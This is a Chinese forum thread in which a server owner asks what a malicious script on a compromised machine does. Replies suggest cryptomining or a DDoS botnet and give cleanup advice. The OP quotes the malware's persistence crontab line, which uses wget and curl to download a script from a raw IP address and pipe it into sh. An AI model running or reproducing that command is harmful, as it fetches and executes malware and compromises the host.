这是一个创建于 1233 天前的主题,其中的信息可能已经有所发展或是发生改变。
http://185.150.117.29/x/b
帮忙分析下这些脚本是干什么的?目前看显卡并没有运行,而是定时占用大量带宽。
帮忙分析下这些脚本是干什么的?目前看显卡并没有运行,而是定时占用大量带宽。
 |
1
virusdefender 2021-07-06 13:06:26 +08:00
这种一般都是挖矿
|
 |
2
rwecho OP 15 * * * * wget http://185.150.117.29/x/b -O- | sh || curl http://185.150.117.29/x/b | sh
它在电脑里面创建了一个用户名为:ps 然后里面有一个 crontab 命令 |
 |
3
longbow0 2021-07-06 13:21:13 +08:00
主要是从 185.150.117.29 下载适配了不同硬件版本的木马 bot.*
其中,bot.x86 介绍在 https://s.tencent.com/research/report/1101.html |
 |
4
CaffreySun 2021-07-06 13:39:05 +08:00
这个脚步比较简单,就是“感染”你的服务器,并且创建定时任务重复“感染”。
至于他“感染”你的服务做什么,得看他执行的那些“bot”开头的程序了,找大佬反编译分析一下。 或许用来挖坑。 或许用来执行网络攻击。 |
 |
5
wat4me 2021-07-06 16:11:09 +08:00
|
 |
6
Aresrun 2021-07-06 16:27:19 +08:00
我之前也被入侵了。服务器上没啥东西,就重装了系统
|
 |
7
lopetver 2021-07-06 16:34:37 +08:00
|
 |
8
missz 2021-07-06 17:10:59 +08:00
把服务器做为肉鸡,用来 ddos,所以会时不时带宽拉满
|
 |
9
no1xsyzy 2021-07-06 19:00:09 +08:00
命令行 HTTP 客户端竟然是 wget 和 curl 而没有 lynx
我记得哪个 Unix 环境是默认只有 lynx 的来着? |
 |
10
hlobo 2021-07-06 19:05:57 +08:00 via iPhone
攻击它下载脚本的服务器
|
 |
11
changchong 2021-07-06 22:42:41 +08:00
修改端口怎么样
|
 |
12
yogogo 2021-07-07 08:09:40 +08:00
前几天我一台也是给挂挖矿的,后来就关端口,开 selinux,就好了
|
|
13
rwecho OP 已经把下载的脚本清空了,目前没看到有异常情况,之前 root 密码太弱了
|
 |
15
guanyin8cnq12 2021-07-07 13:57:51 +08:00
一个字,格
|
Select Language